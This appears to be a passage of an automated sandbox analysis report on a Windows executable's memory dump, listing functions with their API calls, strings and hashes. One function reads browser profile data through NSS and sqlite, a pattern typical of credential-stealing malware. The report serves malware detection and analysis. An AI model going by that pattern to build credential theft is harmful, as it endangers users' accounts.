GetLocalTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000001,00000000), ref: 0043E076
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000), ref: 0043E084

Part of subcall function 0043D95B: FileTimeToSystemTime.KERNEL32(?,?,02C3AF48,02C3AF48,00000000,?,0043E09B,?,?,?,?,?,?,?,?,00000001), ref: 0043D970

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043E0B6

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 568878067-0
Opcode ID: c4a1475bebf23b47c5bec081c9681e59432db96943158db8f55715bca652824d
Instruction ID: 5dc5bb988949e37033fa7e8de2553708aac0068194ea5f1efb77c9820a47ae7e
Opcode Fuzzy Hash: c4a1475bebf23b47c5bec081c9681e59432db96943158db8f55715bca652824d
Instruction Fuzzy Hash: 53110DB1D00B189FDB25DFAAC8819EBFBF8FF08204B00492ED196D3650E774A504CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0045C559, Relevance: 3.1, APIs: 2, Instructions: 55COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,00000001,?,0044EA2A,?,Microsoft Visual C++ Runtime Library,00012012,?,00000240,00000001,00421A95,?,?,?,00000000,00000480), ref: 0045C4E2
OutputDebugStringW.KERNEL32(00000000,?,0044EA2A,?,Microsoft Visual C++ Runtime Library,00012012,?,00000240,00000001,00421A95,?,?,?,00000000,00000480,A:\_Work\rc-build-v1-exe\json.hpp), ref: 0045C4F9

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DebugDebuggerOutputPresentString
String ID:
API String ID: 4086329628-0
Opcode ID: 25770f6f7dd1c086d772aad6d8623a7e1a5b5ad8f89f666f21ef17a06f7924ca
Instruction ID: 0d2b1a0ade15b69f2d7347783be55e8742076589e60eba3c6b6eb5fe894b00fa
Opcode Fuzzy Hash: 25770f6f7dd1c086d772aad6d8623a7e1a5b5ad8f89f666f21ef17a06f7924ca
Instruction Fuzzy Hash: AE01B17110032D7BDA202E965C82B6F3759AB01767F180017FD15A6243EE69E81AA1AE

Uniqueness

Uniqueness Score: -1.00%

Function 00440985, Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0044099B

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 97ef42a2c544be722fb6d023d3c943f4503bb43cf0619ee2a3bcd1cbb7cb48ce
Instruction ID: 618e401a7c8a0adeb8250b96beae0f9c79fd158a929ca41e9a49ff9f097408f7
Opcode Fuzzy Hash: 97ef42a2c544be722fb6d023d3c943f4503bb43cf0619ee2a3bcd1cbb7cb48ce
Instruction Fuzzy Hash: 11514AB1A012068FEB14CF94D8917AEBBF0FB54314F24886AD515FB351E378A950CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004629F7, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E

Part of subcall function 004571CB: _free.LIBCMT ref: 0045722D
Part of subcall function 004571CB: _free.LIBCMT ref: 00457263

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00462A4B

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: 61b0c6a9bb120798ef32ad72ce2bfbe8f939892477555181889b6636e3d09e98
Instruction ID: d4d0c1b07770b8756cd372bfa24e877e454908c764530ebdd94d195e8e0c32f5
Opcode Fuzzy Hash: 61b0c6a9bb120798ef32ad72ce2bfbe8f939892477555181889b6636e3d09e98
Instruction Fuzzy Hash: 0B21A171641606BBDB289AA5DD41ABB73A8EF44305F10007FFD01D6241FAB8DD45C75A

Uniqueness

Uniqueness Score: -1.00%

Function 0046267E, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E

EnumSystemLocalesW.KERNEL32(004627A4,00000001,00000000,?,-00000050,?,00462DD2,00000000,?,?,?,00000055,?), ref: 004626F0

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 53abe61e9f7f88496ddc64f022bd9303cdf0d5838115ca1bfcc0d4334bffb6e6
Instruction ID: a214c30e2b0840ca46362df8f44745d076b74c97768bb3cb79ee071566a33ec8
Opcode Fuzzy Hash: 53abe61e9f7f88496ddc64f022bd9303cdf0d5838115ca1bfcc0d4334bffb6e6
Instruction Fuzzy Hash: 5A114C3B604B016FDB189F39C9915BAB791FF80359B15443EE98787740E7B57802C744

Uniqueness

Uniqueness Score: -1.00%

Function 00462C23, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004629C0,00000000,00000000,?), ref: 00462C4F

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: d424335f64e28dbcdcee87eee48c0e8f8863f139a4d694322cec1c8b80a45ad6
Instruction ID: a69f90c8d9d38a3dd937ea4e62a83cd673957c6b1ce9293f351160b58d10c302
Opcode Fuzzy Hash: d424335f64e28dbcdcee87eee48c0e8f8863f139a4d694322cec1c8b80a45ad6
Instruction Fuzzy Hash: 94F0F932A009137BEB245A61CE45BBF7B58EB40355F14442AEC02A3240FABCFD41C69A

Uniqueness

Uniqueness Score: -1.00%

Function 0046258C, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E

Part of subcall function 004571CB: _free.LIBCMT ref: 0045722D
Part of subcall function 004571CB: _free.LIBCMT ref: 00457263

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 004625E0

Strings

utf8, xrefs: 0046254F
0&G, xrefs: 00462408

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast_free$InfoLocale
String ID: 0&G$utf8
API String ID: 2003897158-2116212543
Opcode ID: baa68ca91bddc46cd499e0e5059263a9408ec52ec63f7120597c0508089360f4
Instruction ID: 2cc157241e3020f81b59ad1cb66ad8fdfb3320e9df6087c07224aede26a875a4
Opcode Fuzzy Hash: baa68ca91bddc46cd499e0e5059263a9408ec52ec63f7120597c0508089360f4
Instruction Fuzzy Hash: 8DF02832A01105BBD724AB74ED55EBE33ACDB45318F10007FFA02D7281EABCAD058759

Uniqueness

Uniqueness Score: -1.00%

Function 00462719, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E

EnumSystemLocalesW.KERNEL32(004629F7,00000001,00000002,?,-00000050,?,00462D96,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00462763

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 4c64c37b66b48842290b7bf6991279d2d783927b0e0f57c7383964fc2e696d08
Instruction ID: ace6497e85dc02f5aee632768e4d279fd59aa01d0cd738ba3751b8fdf9a8d65e
Opcode Fuzzy Hash: 4c64c37b66b48842290b7bf6991279d2d783927b0e0f57c7383964fc2e696d08
Instruction Fuzzy Hash: 5BF028763007046FCB245F359881AB67B94EF80359F04443EF9014B690E6F95C02C644

Uniqueness

Uniqueness Score: -1.00%

Function 00458577, Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00452551: EnterCriticalSection.KERNEL32(?,?,00453DF7,00000000,00484E90,0000000C,00453DBE,?,?,00458540,?,?,0045736D,00000001,00000364,00000008), ref: 00452560

EnumSystemLocalesW.KERNEL32(0045856A,00000001,00485070,0000000C,00458A49,00000000), ref: 004585AF

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: c8bd6c6404a5ffb51839ad0765aab8f508ba7f1ba7e19109230fb052114a0333
Instruction ID: bd975b07eb74d256c9eb258310aeca0a503a7fc08ac9ff67c2137e3b57904c10
Opcode Fuzzy Hash: c8bd6c6404a5ffb51839ad0765aab8f508ba7f1ba7e19109230fb052114a0333
Instruction Fuzzy Hash: 2DF04472A40204EFE700DFA9E842B5C77B0EB06725F20452FF414E7291DB795904CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00462633, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E

EnumSystemLocalesW.KERNEL32(0046258C,00000001,00000002,?,?,00462DF4,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0046266A

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: d103e07a5380b81aece0e4b7cd7bb1ce75df0e355c626d03c09c3e4d4cbf32a9
Instruction ID: 34286e696306eacaf8ba8f9a882d975dc3cd7aecf62a9ad536f58892c62780d6
Opcode Fuzzy Hash: d103e07a5380b81aece0e4b7cd7bb1ce75df0e355c626d03c09c3e4d4cbf32a9
Instruction Fuzzy Hash: ECF0553A30060567CB149F36D95576A7F94EFC1714B06806AEA068B291E2B9D843C799

Uniqueness

Uniqueness Score: -1.00%

Function 00458BA4, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00456179,?,20001004,00000000,00000002,?,?,00455764), ref: 00458BD8

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 4c7ca43d17276366b973f20aa50c3a9bf86f3becbbf06615761dcf39d33e4ca1
Instruction ID: 00937211b2f484656d524a2356035376e32b0c16ae6efd06d943c785aa9bf2b0
Opcode Fuzzy Hash: 4c7ca43d17276366b973f20aa50c3a9bf86f3becbbf06615761dcf39d33e4ca1
Instruction Fuzzy Hash: AEE04875A0011CB7CF122F51DC05E9E3E59FF54752F044029FC0575261CF769D259ADA

Uniqueness

Uniqueness Score: -1.00%

Function 00440CC5, Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00040CD1,00440649), ref: 00440CCA

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8beeee68278578a977a58922a0c5611c6b784f3663facc1976e8a805a08aee71
Instruction ID: dba0d05fd5ef83f1c9e8805d8f94acbaeef4457f38b4b366c7732df14f1503c4
Opcode Fuzzy Hash: 8beeee68278578a977a58922a0c5611c6b784f3663facc1976e8a805a08aee71
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0041E014, Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5b0e66b16ccbd8f0a40714c19fa5bdb7e71b6b32d28678020640cb824cf4a89
Instruction ID: 2b68b11eeb88712b8ce7400ea382997c22786c23b16cca6d2aeda21fdd285ab6
Opcode Fuzzy Hash: b5b0e66b16ccbd8f0a40714c19fa5bdb7e71b6b32d28678020640cb824cf4a89
Instruction Fuzzy Hash: 7AE11575E002299FCF14CFA9D590AEDBBF5FB88314F2481AAE855E7340D634A9818F54

Uniqueness

Uniqueness Score: -1.00%

Function 004484BA, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0e3146ed4e506c00fe44265853dcf02891529dccaae15279d9a213ad0e351c1
Instruction ID: e946252db305763ed07a346dec792169a84f57976465df867b6f9558783c8005
Opcode Fuzzy Hash: c0e3146ed4e506c00fe44265853dcf02891529dccaae15279d9a213ad0e351c1
Instruction Fuzzy Hash: BC515E71E00119AFEF04CF99C981AAEBBB2EF88304F19805DE915AB341D7389E51DB95

Uniqueness

Uniqueness Score: -1.00%

Function 0045A5DD, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82824502b330d7f56d0fd5b4110d415c4a04fe01cf4805b472d714490720a1ae
Instruction ID: ffbed51893eee56e5f0a6d5d594a499ec612e4216e0ed18c4b9e673d5f7a457b
Opcode Fuzzy Hash: 82824502b330d7f56d0fd5b4110d415c4a04fe01cf4805b472d714490720a1ae
Instruction Fuzzy Hash: D721B673F204394B770CC47E8C532BDB6E1C68C541745423EE8A6EA2C1D968D917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 0045A4BD, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90b5447c475a5e9687ff1c3da719cc89c4f53068e936a2e9c473093f8a0f27e2
Instruction ID: d4796199420aa186b6c44f707558acbf23b85472b2e64044f100dbabf6d3acde
Opcode Fuzzy Hash: 90b5447c475a5e9687ff1c3da719cc89c4f53068e936a2e9c473093f8a0f27e2
Instruction Fuzzy Hash: B911A723F30C296B675C81698C172BE91D2DBD824430F433BD826E7284F994DE23D294

Uniqueness

Uniqueness Score: -1.00%

Function 00442F90, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 0726843ab750e1f147131c7fd48d3fec8f4e4b69e7e819f89a0ab7566d3409b8
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: A3115E7720408143F645CA2DCAB46BBD3A5FBC53217EC4377F0428BB48C56AD949B608

Uniqueness

Uniqueness Score: -1.00%

Function 0041E857, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32d2fa60569f027d70f6bd040317d7149808b2a5500fbd3f3a48173b9d07b044
Instruction ID: b08065770aaa3e5024261f6b8f27829de5e14fae179c59a4b636cbd334e7375d
Opcode Fuzzy Hash: 32d2fa60569f027d70f6bd040317d7149808b2a5500fbd3f3a48173b9d07b044
Instruction Fuzzy Hash: C02169705241B145864C5B3AAC2143BBB919B8721338B42BFED8BDA0D2C52ED5B5D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0045A0B2, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9a885f2fdba41f838a509d97cb48f81f2635d64a58ae0c9c204ea1fe0e0e8b7
Instruction ID: 0f35cd1cdfa2507b62c58bdd5256ef98e78387180735e39f6991d5b358c28599
Opcode Fuzzy Hash: a9a885f2fdba41f838a509d97cb48f81f2635d64a58ae0c9c204ea1fe0e0e8b7
Instruction Fuzzy Hash: 72F02B32650130DBC726DEAC8909B59739CF705B52F10825BED02E7392CAB8DE48D3CA

Uniqueness

Uniqueness Score: -1.00%

Function 0045A03D, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a384c0fe3c91c4020970930302fec913fc5f6a764468d93dc06b5bc6a1ce926e
Instruction ID: b71f545da49f6d3db7369e6d6598d851a446798c0fa16d89008dba216badf81b
Opcode Fuzzy Hash: a384c0fe3c91c4020970930302fec913fc5f6a764468d93dc06b5bc6a1ce926e
Instruction Fuzzy Hash: EFF03031621224DBCB26DF8CD845A4973ACEB45B55F11415BE901EB292C6B8DE04C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 0045A081, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 538c0dc1fdeaa7f402cbd69b372671aa0434c65f5ed6242623221e9b96d6851e
Instruction ID: 493225b8908fd9986b6f6fb6852177c2f8e07a3ab156e225542957066ff3c255
Opcode Fuzzy Hash: 538c0dc1fdeaa7f402cbd69b372671aa0434c65f5ed6242623221e9b96d6851e
Instruction Fuzzy Hash: 45E08C32921238EBCB14DF89C94498AF3ECEB84F06B11419BB901E3252C678DE04C7E5

Uniqueness

Uniqueness Score: -1.00%

Function 0045AC3F, Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 411COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0045AC69
_free.LIBCMT ref: 0045AD42
_free.LIBCMT ref: 0045AD6F

Strings

HXk, xrefs: 0045AC90, 0045ACCF, 0045ACDC, 0045AD13, 0045ADDB, 0045AEE2, 0045AF1F, 0045AF2C

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID: HXk
API String ID: 3409252457-701131494
Opcode ID: 72f7766bd6c7a4e625afa66bc020aa8d8d2c4d510056e49694723bc7dd9ab35f
Instruction ID: 2338aeeaa6bad2ea03f777dfb5de80de433cac2dfbd4136913c997d5fa23ffb5
Opcode Fuzzy Hash: 72f7766bd6c7a4e625afa66bc020aa8d8d2c4d510056e49694723bc7dd9ab35f
Instruction Fuzzy Hash: 92D11471904305AFDB20AF659842A6F77E4EF00316F04466FED119B383EB398918CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 00422683, Relevance: 28.4, APIs: 6, Strings: 10, Instructions: 432COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00422688
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000001,00000000), ref: 004226AC

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

Part of subcall function 0040AC66: __EH_prolog.LIBCMT ref: 0040AC6B

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

NSS_Init.NSS3(?,?,?,?,?,?), ref: 004227B6

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Part of subcall function 00435C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000001), ref: 00435CB7

sqlite3_finalize.NSS3(?), ref: 00422C80
sqlite3_close.NSS3(?), ref: 00422C8A
NSS_Shutdown.NSS3(?,00000001,?,?,?), ref: 00422CC1

Strings

{`z4, xrefs: 00422B95
Profiles, xrefs: 004226BE
#9, xrefs: 00422B57
nt, xrefs: 00422BE4
' t", xrefs: 00422BD4
G, xrefs: 00422A40
., xrefs: 00422B9C
WKIW, xrefs: 00422A28
7, xrefs: 00422B17
='= , xrefs: 00422BDB

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Deallocate$EnvironmentFolderInitPathShutdownVariable_strcatsqlite3_closesqlite3_finalize
String ID: #9$' t"$.$7$='= $G$Profiles$WKIW$nt${`z4
API String ID: 3790890743-686067381
Opcode ID: a5745c39c6aebfbfb12dcfef96320ab6d434fd714f95c0415503baa7426a7648
Instruction ID: c9ba6cc73b6555bc485a7635afdeff473f944dfaad42a9601cbffc47b3617cf0
Opcode Fuzzy Hash: a5745c39c6aebfbfb12dcfef96320ab6d434fd714f95c0415503baa7426a7648
Instruction Fuzzy Hash: 0612DD30E04298CADF25DBA5C9907EDBBB0AF59304F5041AED40977292EB781E89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00452076, Relevance: 22.9, APIs: 15, Instructions: 357COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004520E5
_free.LIBCMT ref: 004520FB
_free.LIBCMT ref: 0045210E
_free.LIBCMT ref: 00452123
_free.LIBCMT ref: 00452138
GetCPInfo.KERNEL32(?,?), ref: 00452182

Part of subcall function 0045D7C4: _free.LIBCMT ref: 0045D82F

_free.LIBCMT ref: 004523ED
_free.LIBCMT ref: 00452400
_free.LIBCMT ref: 0045240E
_free.LIBCMT ref: 00452419
_free.LIBCMT ref: 0045245B
_free.LIBCMT ref: 00452463
_free.LIBCMT ref: 00452469
_free.LIBCMT ref: 00452471
_free.LIBCMT ref: 0045247F

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: cf4c2ffb721b4b724475d04a849912554015005390b25ca616f0524cd5533d08
Instruction ID: d2e0628ef23e4c9b2675df8823be0be2d1987371ec530bc30c7eab761a6d51e8
Opcode Fuzzy Hash: cf4c2ffb721b4b724475d04a849912554015005390b25ca616f0524cd5533d08
Instruction Fuzzy Hash: B2D1AE719002059FDB11CF79C981BAEBBF5BF0A301F14412FE995A7342DBB8A9498B64

Uniqueness

Uniqueness Score: -1.00%

Function 0044EA63, Relevance: 21.4, APIs: 2, Strings: 10, Instructions: 403COMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,00421A95,?,00000001), ref: 0044EB09
GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,00421A95,?,00000001), ref: 0044EB2D

Strings

Expression: , xrefs: 0044EDC3
<program name unknown>, xrefs: 0044EB37
\, xrefs: 0044EC2A
Program: , xrefs: 0044EACB
..., xrefs: 0044EB88, 0044ECA7, 0044ECF9, 0044EE3D, 0044EEC0, 0044EEF3
Assertion failed!, xrefs: 0044EA87
Line: , xrefs: 0044ED49
For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts, xrefs: 0044EE6C
File: , xrefs: 0044EBD3
(Press Retry to debug the application - JIT must be enabled), xrefs: 0044EE96

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Module$FileHandleName
String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\
API String ID: 4146042529-3261600717
Opcode ID: 65529fed557b786163c570326af70ea110352edf082673693af1aac331673cb2
Instruction ID: cbb005097d3f3b27990ba66f3e62166c6a70d73ee99de89e4c8c3d79c473411f
Opcode Fuzzy Hash: 65529fed557b786163c570326af70ea110352edf082673693af1aac331673cb2
Instruction Fuzzy Hash: 51C10C71E002057AEB24AA26DC85FFF7368EF65708F1440AAFD09D5242F63C9E49CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 00460E12, Relevance: 18.4, APIs: 12, Instructions: 374COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00460E5A
_free.LIBCMT ref: 00460E7E
_free.LIBCMT ref: 00460E8B
_free.LIBCMT ref: 00460EB0
_free.LIBCMT ref: 00460EBD
_free.LIBCMT ref: 00460EC6
_free.LIBCMT ref: 004611A1
_free.LIBCMT ref: 004611A9

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 165a86ef1437454bee55f2f6b9baf1c825203ef906a7616dfb2248a2b0c7dc66
Instruction ID: 044498e305906c7a80358a9b0b6d411497d4feeff425d9d2922d264d49a5d47a
Opcode Fuzzy Hash: 165a86ef1437454bee55f2f6b9baf1c825203ef906a7616dfb2248a2b0c7dc66
Instruction Fuzzy Hash: ACC14572D40204AFDB20DBA9DC42FDF77F89F08705F14416AFE04EB292E674A9458B65

Uniqueness

Uniqueness Score: -1.00%

Function 00424016, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 162COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042401B

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Strings

6rkw, xrefs: 00424102, 00424154
; expected , xrefs: 004241FF
while parsing , xrefs: 00424061
syntax error , xrefs: 00424038
unexpected , xrefs: 004241A0
; last read: ', xrefs: 004240F6

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prolog
String ID: 6rkw$; expected $; last read: '$syntax error $unexpected $while parsing
API String ID: 3708980276-377966253
Opcode ID: dda593ff9c4b08978e65241a07991480b47354a66306b907ea640653ccf6389e
Instruction ID: 81074ebcdcb79a76691b02df632c9b039df9ed7aba0e7bb70cb7591c71e232d5
Opcode Fuzzy Hash: dda593ff9c4b08978e65241a07991480b47354a66306b907ea640653ccf6389e
Instruction Fuzzy Hash: C3617F70900208DFCB05EFA5C991BEDFBB4AF58314F54405EE009F7282DBB85A99DB69

Uniqueness

Uniqueness Score: -1.00%

Function 0043A6AC, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043A6B1
std::_Lockit::_Lockit.LIBCPMT ref: 0043A6BF
int.LIBCPMT ref: 0043A6D6

